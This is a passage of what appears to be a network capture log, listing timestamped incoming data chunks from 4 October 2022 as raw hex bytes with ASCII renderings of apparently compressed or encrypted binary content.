                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22552INData Raw: e3 4e 8e 2c 2b 3d f4 75 26 f7 5a c1 eb 62 02 62 a9 58 61 c7 2f 94 92 0b 56 35 1c 7a b4 24 6d b1 50 80 fb 14 08 93 94 ca 3a 64 6b 90 41 6d 09 e6 9b 94 ce 38 35 ba 8c b0 75 50 cb a7 50 6d fb 3b a7 c9 36 fc d9 9f 42 9e 36 5f 88 1d 40 60 8b 41 f2 01 c4 a2 ec cb 54 5f 33 8d fe 9c b4 4c b1 34 cd d7 56 a4 3e d0 98 f3 70 a8 93 ba ae 5b 33 ac 84 cd 43 c8 0b 0b e6 d6 a7 ee cd e9 9c 1c 42 2b 71 be 6a 31 9e a5 d5 53 8a ac ca fd 28 32 09 c4 0c df 05 4b 64 25 9e 29 5e b0 1a 9a f6 7f ce f0 81 01 36 e2 8b 84 2d 6c 8c 9e 1d e1 c5 bd d4 cc 26 e7 e2 43 06 34 50 c3 0f e0 ae 79 13 b7 94 d6 08 53 c6 a9 e3 0c e6 a0 c5 cd 01 44 7f 4a 39 c5 53 4f 71 8b fe 59 58 bb 60 57 1a 9d 81 46 54 5e 04 0f 2d 02 e0 38 80 19 56 b8 9f 6d 8c 87 17 75 27 fb af a8 a0 07 61 ad ba 77 4b 9d 44 a7 df
                                                                                                                                                                                                                                    Data Ascii: N,+=u&ZbbXa/V5z$mP:dkAm85uPPm;6B6_@`AT_3L4V>p[3CB+qj1S(2Kd%)^6-l&C4PySDJ9SOqYX`WFT^-8Vmu'awKD
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22568INData Raw: 1f 18 3c ef 6c 7d 3d 35 5a 70 14 1d cb ec 3c 01 0a 05 0a 83 ba 3d 14 f3 86 01 98 93 9f c7 14 c7 39 b0 68 20 c9 61 3f 51 ed 7b b9 fd 89 09 ff 03 6d 97 ab 80 63 d4 c0 4f 10 1c b7 53 0c fb 22 36 8b de d3 cf a2 e8 12 52 3d c8 b9 d8 49 d6 11 a5 e8 89 23 c1 0d 00 c2 83 1b 1b 09 36 2b 3d 35 d0 16 74 85 2e 61 b0 de 85 d6 a0 79 01 c4 8f 1a 07 3a 4c 1b d0 63 f0 7f 9f 82 7f 88 2f 00 48 cc 56 0e b9 d8 b1 b1 92 35 f9 1e f8 a2 f3 9b c8 8a 29 18 d7 3b 56 82 8d d8 cd 1b 22 2a 9b 43 a6 02 af 29 65 72 6f c6 0f 6f aa 74 82 fd 56 0c b7 c3 c8 4c c6 a2 29 f0 02 0a c1 19 c7 f9 76 f2 82 e0 e1 bf ad 98 75 84 1c 1e a6 cd 46 8e 37 cc 68 0a 0a 7c 0f 13 61 eb 4d 35 15 c7 f8 59 9a a5 2c 22 2b 61 06 c8 2a cc 16 e4 7b b6 7b f5 1a 13 55 ba 56 a6 a6 f0 93 c0 72 b2 5f 58 f5 2e 94 e2 72 ad
                                                                                                                                                                                                                                    Data Ascii: <l}=5Zp<=9h a?Q{mcOS"6R=I#6+=5t.ay:Lc/HV5);V"*C)erootVL)vuF7h|aM5Y,"+a*{{UVr_X.r
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22584INData Raw: ff 7c de 69 27 83 be 0d a8 77 e2 da 27 20 0f 4c 83 f9 15 2e be b7 8f 01 6e c1 cc 15 29 36 7f 26 cd b7 86 fa 52 ad c3 3b ec 7b 7a bd a1 8d e4 25 cd d5 90 0e 75 6c 82 83 56 1f 64 5d 70 62 96 b8 21 4a 80 45 06 40 18 e7 8e 2b d3 da ba 5f 08 ed ae aa 9e 5d 4b bb 12 f8 6a 48 2a b4 c0 32 1b b0 86 d3 e4 be 9e fb ed 09 52 42 53 ad 72 08 67 8d 22 08 6b a7 5e 87 4a b2 6d 6c 86 99 00 f1 56 57 0a cb 81 dd 11 07 18 8e 82 4a 94 aa 1e 77 2c d8 91 41 8d c4 2b 3c 31 91 78 c2 36 c9 fc 4d f3 c9 a5 8e 9d 88 d6 cb 6a 77 34 37 be 8f 80 31 d9 23 41 c2 21 37 29 a1 cc ef e8 b2 1c 7f 9b 83 4b d3 dd d0 ae 49 b7 f5 a7 04 92 81 bd d4 e6 9f 2a d4 d6 a9 93 43 be d9 aa 2a 3e 47 12 ca 59 bf e4 66 af ef 40 21 0b fb 08 18 b2 7f d1 00 fb ea f2 f3 82 09 70 22 0b e2 2e 0e 78 67 c2 d3 fb d7 c9
                                                                                                                                                                                                                                    Data Ascii: |i'w' L.n)6&R;{z%ulVd]pb!JE@+_]KjH*2RBSrg"k^JmlVWJw,A+<1x6Mjw471#A!7)KI*C*>GYf@!p".xg
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22600INData Raw: 1c 00 17 40 df 14 0f 1b c1 a3 03 80 13 b2 d5 09 c1 e7 85 bd cf ce 7b a6 15 d7 63 03 07 c5 88 29 ae 0c d8 a1 16 3e e3 60 05 83 9b 88 bf a0 b9 73 3a 44 24 86 17 3c 8d 1f 9d 4b 13 db 57 0e 3e b6 d8 84 1e 76 23 24 ca cb dc a5 f2 3e c6 84 73 1d 62 29 81 e6 ca d6 cd 66 b7 72 f8 cd 0f 7e 7f fc cc 4f 83 4e 9c ba c6 e6 02 40 32 19 1b 9c 06 02 1d 5b 3a bf e6 e3 8b 55 ac 15 67 d8 f2 0a 30 19 28 4f 20 38 83 13 71 79 9d ad 3f cb e7 0b 8e 44 ad c4 14 d2 35 dc 9e c3 05 64 ca 5b 47 40 18 5f 86 4c f4 f5 79 7f 03 e2 80 d0 11 b3 48 b0 54 c9 01 02 88 80 cb 5d dc 26 fd ef 80 7e 5f 88 11 00 07 1b 86 dc fd 11 f6 3f 95 af 00 9c f1 5d a4 41 71 e5 9f db 88 3a 7d 7e 5f ae 1d 80 39 2e d4 b3 41 6d 51 84 20 b8 f7 c8 a8 75 de d5 dd b5 f5 96 1b c2 c8 d4 2f 2e 60 a0 b0 bd e7 e5 c5 d1 3f
                                                                                                                                                                                                                                    Data Ascii: @{c)>`s:D$<KW>v#$>sb)fr~ON@2[:Ug0(O 8qy?D5d[G@_LyHT]&~_?]Aq:}~_9.AmQ u/.`?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22616INData Raw: 8b 68 c0 45 f4 0d 81 10 be 33 c7 97 cc d0 e6 f3 72 9b 89 cd 9a 46 f2 68 68 6f aa d6 16 05 8a 0b 5a c9 b6 b8 0f 08 98 6c 3c 3d 49 b3 b6 7a 5a 32 16 ea 13 2f 38 d9 e0 68 56 07 c1 ad bc 77 c3 26 1a 8f 77 21 17 1b 89 ee 6d bd cb af a2 ee 07 78 97 06 8c d7 36 f2 be 4f e4 eb 4d 1a ea b5 83 d4 ac 4f c1 ec ad 62 6f c4 3e 9f a3 f1 6e f3 cd 24 96 91 fa e8 84 ec 10 22 fa 07 a7 26 23 31 ed c3 7a 5e 58 a9 ae c0 53 af 04 d0 71 1e 30 07 98 66 48 35 96 ab 33 7a 6c f2 c6 50 4a 0d 7d f2 26 ab 35 4a b8 da 03 0c 2e 2b fb f7 27 4a be 25 0e 60 e6 f3 fb 4d 93 75 91 bd 0b 01 9e 33 99 3b 7f c2 67 65 0d e2 7f dd 8c eb d8 52 56 75 5c e1 cc 65 6c c9 fe 4c f0 7c 19 27 c2 c0 cf ec 69 7f fb 7e c8 cf 9a 91 5d af ba 51 39 dd 12 4a 46 e8 13 8b fb cf b0 5a 92 0d db 4c c5 ad 78 c6 39 93 b8
                                                                                                                                                                                                                                    Data Ascii: hE3rFhhoZl<=IzZ2/8hVw&w!mx6OMObo>n$"&#1z^XSq0fH53zlPJ}&5J.+'J%`Mu3;geRVu\elL|'i~]Q9JFZLx9
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22632INData Raw: 31 b2 32 61 18 28 1b fd 9f e6 fa e8 41 f2 4e bf a6 19 3a 66 e0 c7 e5 11 3a 51 d1 a6 6c ef 5e fe b8 8e 78 76 52 f5 95 f7 15 8e d9 96 78 79 ec e4 5b 2d 9a cd 30 5b 21 f4 2c a6 88 97 ea 46 fd 1a 28 28 d0 83 cb d3 45 4f be 2d 2d d4 29 85 d5 aa 30 2c aa 4e b5 59 fb 83 cb fd b7 c2 22 35 73 c4 23 88 7e 9f f1 8f c8 db 37 06 be 1f d8 c6 cb ec d1 da 35 4c e1 60 31 a3 db 7a ff 7a c4 3b 12 d8 96 56 f9 d3 76 0b 0a 86 64 a7 87 2d 9a e5 c6 97 da 7e ff ad 37 bc 12 6b 61 8b d7 8e b0 1e d0 e0 3a 8c be fa d0 9f 54 8e 2c 8f fa 55 d7 13 05 e5 77 1d 4e 87 1b 74 54 6c fc cb 87 5e c0 38 01 69 8d fa a3 de fa 10 91 ee a5 17 68 ee 85 9e 12 fb ec ad 65 cd 09 49 6b 0b de f6 99 6d 40 22 81 dc b0 80 e0 03 4b 9d 6c 08 da 68 e9 aa 95 6b 37 f4 fb c2 27 8a a9 25 e8 18 1a b0 84 f0 f2 e5 68
                                                                                                                                                                                                                                    Data Ascii: 12a(AN:f:Ql^xvRxy[-0[!,F((EO--)0,NY"5s#~75L`1zz;Vvd-~7ka:T,UwNtTl^8iheIkm@"Klhk7'%h
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22648INData Raw: 93 eb bf 86 9b a6 26 4c 12 4b 04 49 83 99 f7 20 04 dc 15 ff b2 16 51 c2 2d 1e 56 7a 32 3d 11 8a 9b 95 bc a7 a3 ca 3b 79 ef 44 cf ec c1 96 cb a7 d9 29 7c 68 ef c8 ff 2b 2b c3 95 60 c7 ad 1a 41 77 07 27 22 20 b4 82 28 95 7a e9 66 9b ea 2f f0 65 f9 60 69 7b a6 7a 5c f4 96 3d cf 00 5d f1 90 93 60 f8 4e aa c3 94 91 4f 3f 16 c8 51 84 fd 6d 8d 0a ac aa ae 54 b1 66 1c 9a 36 f0 8b b2 7e 2e 30 c8 c6 d5 0d 52 37 76 b3 f8 cc 3f 85 d9 4b 34 97 fe 10 33 f1 b3 bc 03 64 bb 73 2c 30 7d ee 80 b9 69 c9 ef b0 08 db 0d 93 f0 a3 d4 bb f4 48 bf 95 d0 02 e4 f8 af 3c 8c df 69 8e e1 21 a2 36 4b af ed 7d 2b c5 05 3f 3d 48 1d d1 9e f1 c0 42 89 d3 0d 93 43 4d 52 50 a9 fa 45 50 46 54 51 0d b9 33 68 b5 1f a1 02 75 38 3f 8a bf e9 14 f4 25 ca 61 54 f1 8d 7b ed db c1 c2 38 ae 21 a0 31 5b
                                                                                                                                                                                                                                    Data Ascii: &LKI Q-Vz2=;yD)|h++`Aw'" (zf/e`i{z\=]`NO?QmTf6~.0R7v?K43ds,0}iH<i!6K}+?=HBCMRPEPFTQ3hu8?%aT{8!1[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22664INData Raw: 50 a7 eb 6a 02 b2 3a 0a 42 16 07 89 92 4a d8 ad 48 17 9c f5 bf 83 36 bf 3f be 9b e5 af 3d 72 cf 85 97 a1 9c 1e ba 1a 9d 9c 92 dc b3 5b 17 cb 7e bf 5f a8 e7 11 8a 94 e1 17 1a 07 d3 29 3e 50 f2 eb c8 e8 c0 c0 74 15 51 1a 48 a0 0f e1 bd 2f 19 26 da 77 ba c8 81 dc a4 e0 02 33 73 72 ff 65 15 5e c8 c4 7b d1 4c e6 d5 e5 cb ae 95 9c f6 e1 af ce 33 e7 ff b5 81 1d d7 0c 71 14 52 85 28 1c 1b 95 e2 d9 0b a2 cf 78 0e ff e4 18 de 59 fe ed 8b c6 e9 4b f7 1c e4 6b 58 1d 7e e4 b9 30 52 ec 0c 88 13 a2 4b 81 61 c8 d1 84 ea a9 ce 59 7e b9 95 fa a5 b6 d0 d9 1f f6 6e 14 bf 93 13 7e e6 b2 76 02 ea 20 cd a8 33 22 0e 8e 71 fb c1 17 9b 64 7c 5b 4a 4c 30 fa b3 f8 cb da 50 84 d4 a8 44 29 7d c3 69 af 31 5e 16 24 68 c4 ee 1b 6c cb 88 45 8b 76 d3 da f6 61 42 fe 58 ce aa 9d c6 28 f9 5e
                                                                                                                                                                                                                                    Data Ascii: Pj:BJH6?=r[~_)>PtQH/&w3sre^{L3qR(xYKkX~0RKaY~n~v 3"qd|[JL0PD)}i1^$hlEvaBX(^
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22680INData Raw: 57 e1 78 03 8a 38 03 65 bf 2d ee b4 4e 7c df 45 e5 69 b3 57 86 d2 0e 54 38 cd ef c0 f1 ac 7f a4 d1 1e 60 8a 2f 62 91 6d 0e 36 0c 49 8a 9a 8f f1 c9 37 b1 74 00 19 1b 3d ca 26 95 01 1e c5 72 31 a3 18 b2 ce a6 69 bc 43 2a 82 d6 63 9b 93 46 25 19 1b de 37 88 0f 7b b1 c4 31 73 6b 27 60 ca fe 30 8f 8a 06 f6 33 31 97 b0 f3 80 2b 40 16 35 23 fa f8 e1 9d ab e2 99 3a 79 86 fe 11 5d 98 bc 9e ce 0e a4 a2 46 66 b8 cf a0 aa 42 a2 4d 4a 9f d2 7b bb e4 7c 12 12 74 36 8d 42 39 fa 93 63 0e a5 59 3f 5c 6c d1 89 e5 44 96 01 f5 5d 9f 63 36 32 fd bf 6d 88 30 c4 f9 c2 d1 7a 90 7c 78 35 c8 75 42 ca fb 31 f6 fe e3 ed c8 44 0d d8 90 12 ba 19 3d 05 da be 5d c3 b2 ee cc 68 11 e1 f2 93 44 6c 19 23 6e 7b e0 8a 50 ad d2 8b 72 ce e1 fb 19 95 f1 92 d7 2f 29 37 9d 7c 9e fb 8e 3d 93 49 45
                                                                                                                                                                                                                                    Data Ascii: Wx8e-N|EiWT8`/bm6I7t=&r1iC*cF%7{1sk'`031+@5#:y]FfBMJ{|t6B9cY?\lD]c62m0z|x5uB1D=]hDl#n{Pr/)7|=IE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22696INData Raw: e8 0c e4 86 5a 59 5d 06 a5 4a 5c f9 29 2f 51 06 6c 49 c4 0b 3d 0b 82 38 34 54 82 68 af da 02 8a 4f b8 aa 23 9c 94 bc 24 39 93 a6 9a f3 9f 39 a8 32 a1 92 a7 c8 b6 24 5c 2a a1 31 05 2b fe 96 c1 1b b2 86 04 c6 90 c7 7b 13 f3 a9 c1 1e 28 29 d7 f9 37 04 01 26 fe a5 6c bc 13 9d d5 e6 09 b1 7d 84 e2 8a 4d cb c6 37 60 1b e0 6b d6 ea 74 93 7e 94 99 fd 45 4d 43 93 17 aa fc 53 e5 cb 71 e2 4c e2 62 40 9b d7 92 c0 ca 88 2e a9 ac 8f 4b 20 6c cb fa 6c 36 5d a8 cb 6e 66 68 e6 4d 05 30 fb 52 d4 4d 56 9c dd 7d 2f fb 2a 3c 48 50 8e 5d 16 65 57 2b 27 c9 0d fc 79 c8 85 ff 7c 23 58 82 8b 4c 34 88 64 1e e4 d1 2f ed 31 fd 4a f6 1f 03 c2 62 77 a5 28 e2 67 7b e1 d5 a2 d9 30 d8 0a a5 9f 03 37 18 e7 41 a2 b2 2c c2 43 f2 7f c4 c9 f8 4b 99 d3 a3 ba 65 d3 ba 3d ab 9b c4 6f c2 43 2d ac
                                                                                                                                                                                                                                    Data Ascii: ZY]J\)/QlI=84ThO#$992$\*1+{()7&l}M7`kt~EMCSqLb@.K ll6]nfhM0RMV}/*<HP]eW+'y|#XL4d/1Jbw(g{07A,CKe=oC-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22712INData Raw: b3 1e 50 fe d7 df 8e d3 cd c0 cb 5d bb 58 be 8a 2e 38 5c b1 b6 f5 71 d7 c1 37 6a bc 74 c5 79 e8 1f 76 46 a9 20 5c 83 01 b7 bf 2e bb df ba 16 4f ca fe 67 a3 ef 18 5e 36 e4 84 e3 86 4b 62 e1 21 fb ff ea 67 a1 b8 ac 03 14 8e e1 ea 9a 27 2a 80 87 fc dd 9e f4 db d1 5d b7 82 2a 80 be a6 9b a2 f9 e6 f1 07 3f 34 c8 fb 3f ac 41 15 fc 1d b7 f3 84 22 eb 18 5d ed e1 fc 68 d5 4d 3c 85 c2 00 4c 79 47 11 5c 16 aa 39 a3 60 5e 39 c0 1d 9a 54 dd b3 70 43 5b 94 36 1c ec 5e 81 00 94 2e 5d 48 e2 0d c1 91 2d 07 c5 b3 90 d7 e1 6b d4 a1 a6 e6 89 d9 30 6a c0 97 46 9c 3a 32 0b bf 8f 26 2c e5 ad 53 d3 98 26 60 07 65 e9 3a 46 f4 31 12 ed fc c6 9d ab 7b be bf 28 42 46 35 d7 ec 09 5b 7d b0 4b cb 06 11 63 a2 6d 1e c2 ef f5 95 77 b8 7a 0b ba 34 8c 83 e7 0f a4 89 b4 3c db 99 94 e6 e8 74
                                                                                                                                                                                                                                    Data Ascii: P]X.8\q7jtyvF \.Og^6Kb!g'*]*?4?A"]hM<LyG\9`^9TpC[6^.]H-k0jF:2&,S&`e:F1{(BF5[}Kcmwz4<t
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22728INData Raw: 58 33 37 23 bb 3c 77 c1 30 5e 6a 73 5e 96 78 e0 d4 db 62 97 17 95 29 17 e9 94 a9 b3 ec 47 cc 7f c7 31 1e c2 09 c1 63 c3 d8 c2 33 9d de 4c 1a 77 16 80 be 72 72 a6 fd 74 57 56 80 90 0f 2b d4 b7 48 8d 4c df 06 f6 27 02 76 e4 4b 6a fe f1 68 81 68 c5 a9 48 63 e0 d6 d1 d2 69 b2 52 18 2b 44 38 0c 03 7d ea 63 f2 e7 f2 e0 1a 21 6a 80 82 cf 55 17 b4 8d ec 89 25 f7 b8 0a b5 ca a1 3c 79 e6 28 e8 14 0c 07 08 d1 4d 71 b4 b5 29 b2 90 11 95 da f9 57 d8 4a 13 f2 41 a2 3a 2b c7 ae 17 ed e6 53 08 42 89 29 a2 a4 4f 3a 64 ce b0 ab 1d 55 9f 70 f7 b8 d8 f7 0c d6 4a 67 64 bd 4b bb c8 e9 a2 4e 78 26 63 9a 2a 0f 5a 3d a7 d6 69 7f 73 42 ab 77 a4 ab e0 6a dc 07 b8 1b 3c b2 4e c3 ee b8 89 23 d0 43 67 d7 30 ef 37 b5 6b 0c f1 2b e8 42 be f4 fa f8 05 c9 68 b3 a0 7a 6c 0e 88 c9 10 88 3e
                                                                                                                                                                                                                                    Data Ascii: X37#<w0^js^xb)G1c3LwrrtWV+HL'vKjhhHciR+D8}c!jU%<y(Mq)WJA:+SB)O:dUpJgdKNx&c*Z=isBwj<N#Cg07k+Bhzl>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22744INData Raw: 50 2a 1e 50 8c d3 79 77 55 f3 8f bf dd 01 c2 97 07 f8 28 6b 41 4f 44 d7 0f 60 6d 29 7c 02 4d 93 6d b1 3f ee d4 31 d7 4e 8f 85 0a 07 f5 c9 d7 fc e1 45 aa 3f 7c 9c 1f b8 01 ec c4 0e 7b 5f 58 e2 d9 a8 03 75 7c f1 cf 74 34 db 80 74 0a 20 47 f6 08 0a 76 f0 b8 7f 5d 2f e4 21 c2 0e 5e 41 bf 28 23 77 5c 56 bd 76 2e fa b3 a0 81 41 a0 aa e1 bf 10 c7 f6 8f 64 0a e3 02 ee e2 60 55 bc 42 0d 93 3a a7 c8 5e 67 18 80 03 46 48 8c 21 ea 1e 6f 50 fc a8 e5 99 62 19 02 12 82 40 81 48 f1 aa b2 15 8a 11 0e c1 5d 9b 0a 14 24 73 e3 95 bc c6 b1 ee 41 7b e6 f3 18 d7 b7 44 5e b7 6d 5f 8f 78 6c be 19 0d 99 e3 ed 7b c9 2c 34 53 c2 76 30 1a 6c 37 69 1b 13 a0 41 f0 03 10 4f 83 9f 4b 7f 81 50 12 60 cc ed fd a1 0b 79 9c 41 4f 11 09 70 28 e2 1f 7d 4e 9f 1b 59 29 f3 e3 d7 a4 27 3f ce 08 f9
                                                                                                                                                                                                                                    Data Ascii: P*PywU(kAOD`m)|Mm?1NE?|{_Xu|t4t Gv]/!^A(#w\Vv.Ad`UB:^gFH!oPb@H]$sA{D^m_xl{,4Sv0l7iAOKP`yAOp(}NY)'?
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22760INData Raw: 66 f4 02 ac 6c 69 03 70 3f 50 56 65 8c 68 46 6a d1 20 25 b6 ff c9 27 b8 3c 62 58 c2 b2 58 a6 b8 c1 86 83 d6 5f ec 92 a2 a6 94 10 3c bb 6b 20 82 77 be 42 e9 cb 62 4d 8e 93 01 69 89 61 37 83 04 85 16 d0 1e c0 0f 75 4e 9f 6c 2a d9 04 6b cc 7d 18 0b eb ec 6c 9c 82 51 7b 90 40 fc e6 9d 12 78 bf 13 03 9b 0b 1a 56 ce 85 9b 9c e1 fe 71 3b d7 9d 57 9d 4e 62 aa 47 bb ff 7b 39 09 25 1a 94 74 06 2a 1c a4 7c 83 3e 94 0b ce 07 16 1a c7 a8 57 2b ae cd 75 09 3e f4 83 d4 d7 a3 a2 40 ff 46 4b 52 6b 85 2e 81 3b e8 b6 80 19 c9 c9 ea ff f1 c0 59 4d d8 42 e2 cc 65 31 02 87 ba e5 52 31 23 6c b5 97 64 05 1b f8 00 04 59 25 02 0a 23 88 38 09 2c 1d f5 d6 f7 3c c4 97 61 2f ce 34 da 88 99 77 8c cd 09 06 45 8d bf 28 a0 f6 4a fc 6b e1 09 42 44 9e 11 1c 41 4f b5 61 17 36 4b 92 d4 f0 43
                                                                                                                                                                                                                                    Data Ascii: flip?PVehFj %'<bXX_<k wBbMia7uNl*k}lQ{@xVq;WNbG{9%t*|>W+u>@FKRk.;YMBe1R1#ldY%#8,<a/4wE(JkBDAOa6KC
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22776INData Raw: 74 06 c3 7c 6a 60 bb b3 dc f0 b5 3f bb f9 fc b3 02 ad f1 71 9b 31 a1 f2 3f 9b ac f4 fb 2e 4d 7e 0b 4c 4f 81 5e ab 3a a1 c8 e6 43 02 c7 7b fc de ab 93 33 77 17 79 b6 48 dd 24 f1 07 15 57 9c a4 55 c0 ea 5c de 9c d6 0b 79 d5 cc 4d c2 cb 0d 5d 6f ee 87 16 a3 f6 bb 38 3f da 81 42 a0 da c2 30 ab f5 e4 5b 7c e5 71 db a1 f6 aa ee 37 82 8b 15 ae ec b2 60 6e 40 de cf 1b b5 a4 e0 06 46 57 b4 8a 88 8b 5f 17 fc f7 94 1a f7 57 14 2f 1e 80 0d 86 ea ce bb 21 34 de a7 a5 77 30 f4 82 d2 48 5d 2c 56 a5 70 9c a5 d7 4e 4a 75 2f 29 c6 db 9a 14 91 75 7f 14 d3 61 01 0c 49 31 53 e6 6e fc 50 ea 25 57 21 e3 56 e6 e8 9e e2 7a cc 23 bd d5 c7 30 e4 07 cc e1 04 f0 75 b9 0d 75 2b b0 34 55 7a 5f 40 d0 44 34 15 f8 21 0a bf ac d4 59 a2 2d 92 60 a5 89 00 a6 fb 2c 93 30 34 2f 82 7b 29 a2 d3
                                                                                                                                                                                                                                    Data Ascii: t|j`?q1?.M~LO^:C{3wyH$WU\yM]o8?B0[|q7`n@FW_W/!4w0H],VpNJu/)uaI1SnP%W!Vz#0uu+4Uz_@D4!Y-`,04/{)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22792INData Raw: 1e cb 85 4d 6d 15 27 dd ed d4 f1 40 42 9c 4d 53 28 4b c7 05 c5 3b a1 2f d1 9f 3b c0 ee 7c 65 c9 eb af 4a 09 78 4c ea 1a 7e b1 55 4b 60 8e 75 7b f0 fa f2 eb 87 57 8a 0c 93 5e c5 74 66 a2 9f 0c 4c e4 97 77 36 56 88 5f b4 3b 0b d1 5f da 49 24 d5 91 28 cc c7 84 9f 26 39 f2 cd 4d 3d e5 8a 7e 8d 31 6d 51 80 b1 45 7a 3f 99 2e 6d 2c 7f e1 90 5f 37 c7 b5 61 56 6e 26 b9 7e 4e 9e c3 a5 fc da f1 fc 21 07 c2 d1 95 17 d1 d5 ee a7 8e c3 2e 59 e9 56 52 40 0e 05 04 94 3a 50 8e d0 0f e6 ea 30 e2 00 19 17 7d 74 83 c3 64 af 28 15 71 52 7c fe 7c 7b a2 0f ff ac be f9 1d a0 81 70 81 b1 05 8c a4 77 48 59 30 d4 d3 d9 ed 46 19 b2 b3 1c 88 9a 73 02 50 70 ed 34 56 ea 3f 5a f1 a5 78 4d f6 f8 18 ea 1b bb a7 e3 64 99 56 5e 10 50 5c be bd 6f 4d 4b 4d f7 43 53 0a d5 a1 c5 ef a2 b8 b7 81
                                                                                                                                                                                                                                    Data Ascii: Mm'@BMS(K;/;|eJxL~UK`u{W^tfLw6V_;_I$(&9M=~1mQEz?.m,_7aVn&~N!.YVR@:P0}td(qR||{pwHY0FsPp4V?ZxMdV^P\oMKMCS
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22808INData Raw: c2 e7 c6 5e 3f d8 6c 8c b3 3c 99 ae 3b 5b 4d 59 61 69 f4 a4 3c 11 a4 cd 36 e8 27 1c fd af b0 9d f7 a9 ee b6 65 73 e6 b7 82 97 7a 6a 7c f2 64 7f d5 eb a2 b1 df 1a 6d 35 fc 22 cd c5 7e d4 3f 9b 97 96 4c 45 10 7d 5d 60 bb cc 53 6e 1d 2a db 3e 4c 66 5e 45 0e b9 8f 87 6d 08 e7 19 b7 32 27 af 76 27 a4 44 6c fa 26 83 92 ac a3 ff c6 64 9e dd b0 55 fa 9a ee fd 17 9f 38 34 34 ee af a1 6d 08 56 3e c2 0f c6 ce 16 0e 53 32 74 82 ab 1b 85 48 ca 93 57 bc 8c d8 ba 31 1c 94 39 03 97 57 c3 da 21 99 2b d5 e5 cc 07 26 f4 55 e9 c1 06 16 0d 51 fb e1 d1 e6 ce 7f e2 65 f4 bf 0c c3 65 81 51 0d f9 db 36 78 4c af da 92 86 a0 a3 f9 e7 b6 3e 00 5b 5f fd 44 c1 3c b7 1b 05 29 8f 4b 7b fa 62 f4 b9 28 e8 63 4b 3c f5 46 cf 2f f3 9f 05 e9 9d c0 e0 24 ad 3c a3 a8 4c cd e9 ba 1e 85 d0 29 b7
                                                                                                                                                                                                                                    Data Ascii: ^?l<;[MYai<6'eszj|dm5"~?LE}]`Sn*>Lf^Em2'v'Dl&dU844mV>S2tHW19W!+&UQeeQ6xL>[_D<)K{b(cK<F/$<L)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22824INData Raw: 1f 80 d6 0a 96 72 fe 57 75 d8 d4 56 17 30 99 51 05 6f 91 91 7d e1 d3 95 cc 1c 40 c9 16 46 53 d5 6d a6 83 1d df 94 b3 55 c1 1f c8 1b ae db fa 1c 85 c9 36 b9 c2 c7 31 cc c8 67 b3 d6 e8 52 13 a6 28 13 4d 40 85 8a 6a d4 7c 97 c3 0d cf 41 3c b1 f0 48 3a 83 be 0c 30 80 2f a8 01 c9 bd 0d 50 18 76 3e 15 d1 da 22 94 8c 16 70 7a 40 78 40 44 22 0b 22 59 f9 5a b3 b2 09 a8 36 97 15 85 40 3e c9 31 8a 7d 3e 27 b7 f7 ba 41 f9 40 13 cc 55 be 0a 4d 20 b6 d3 7c 7f b0 b3 a5 53 c3 6e 7b 28 8f b4 fb e5 a7 e6 32 12 83 0c ba ab c2 9e 70 1a 04 1f ba 6a a8 c8 fa 19 c6 8f cc d7 de 4e e2 8c 60 2d 23 de 69 51 f1 97 4a 78 4a e5 b7 03 fb fd 6f 43 2c e9 04 18 76 05 15 9d 14 24 a1 cb 10 30 d5 b1 f6 29 12 3d 3f 92 e2 2e a5 49 67 dc 05 7b 72 c3 3a b2 7a 3d c2 2c 9d 53 0b a9 d6 90 c6 fc 36
                                                                                                                                                                                                                                    Data Ascii: rWuV0Qo}@FSmU61gR(M@j|A<H:0/Pv>"pz@x@D""YZ6@>1}>'A@UM |Sn{(2pjN`-#iQJxJoC,v$0)=?.Ig{r:z=,S6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC22840INData Raw: 51 5e 35 5e cb 70 62 bd 6d 70 d4 4e 6b ae f7 1d 8a db 43 89 7b f6 2c 8d 4f c3 d1 ec 9c 42 58 57 fa 46 09 2a 47 04 85 6f 6f 0b 96 a2 9f 29 46 65 af 59 82 a4 f8 ba db af 7d c2 83 9d f1 4e 4f cc ad 86 86 a9 f2 1f a3 4d 97 8a b4 09 9d 9a bf 81 bc cc 9f ab bb d3 81 8e 02 d4 c1 93 00 af e0 fe a6 1e a0 f2 04 e5 c0 f5 1e 14 80 1c b4 15 d6 5d ee 82 a2 b3 c6 88 de 7d 67 dd e1 1f 90 f6 4a f3 22 00 1c 9e 61 f7 97 7d d2 77 fb e2 74 67 ca 4d 91 34 2d 25 f6 e6 b7 28 bf ed aa 24 6f dd 1b ad 45 a3 77 d1 8a 3d f9 2b 8c 0a 39 7b 43 37 34 55 e9 9c 24 fc f2 11 89 5d 91 7d 31 4e 7a 75 c8 18 0b 96 65 ce 10 ce 38 88 cb 0e 34 27 8c ed 9c b9 14 9c b4 e2 3a 3f 15 5b 83 b7 04 c2 ce 67 b7 b6 c0 8a f3 29 2a 99 4b e6 53 66 9b e3 7c 8d ee 1b 5e 4d 02 5e a9 80 45 5b dc 90 de 25 69 e8 c2
                                                                                                                                                                                                                                    Data Ascii: Q^5^pbmpNkC{,OBXWF*Goo)FeY}NOM]}gJ"a}wtgM4-%($oEw=+9{C74U$]}1Nzue84':?[g)*KSf|^M^E[%i
